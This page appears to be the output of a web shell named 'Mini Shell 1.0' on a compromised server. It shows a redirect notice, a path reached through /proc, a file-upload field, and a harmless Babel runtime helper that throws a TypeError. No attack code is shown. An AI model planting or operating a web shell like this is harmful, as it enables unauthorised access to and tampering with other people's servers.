HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991109/root/usr/share/nodejs/@babel/runtime/helpers/esm/
Upload File :
Current File : //proc/1991109/root/usr/share/nodejs/@babel/runtime/helpers/esm/classCheckPrivateStaticAccess.js
export default function _classCheckPrivateStaticAccess(receiver, classConstructor) {
  if (receiver !== classConstructor) {
    throw new TypeError("Private static access of wrong provenance");
  }
}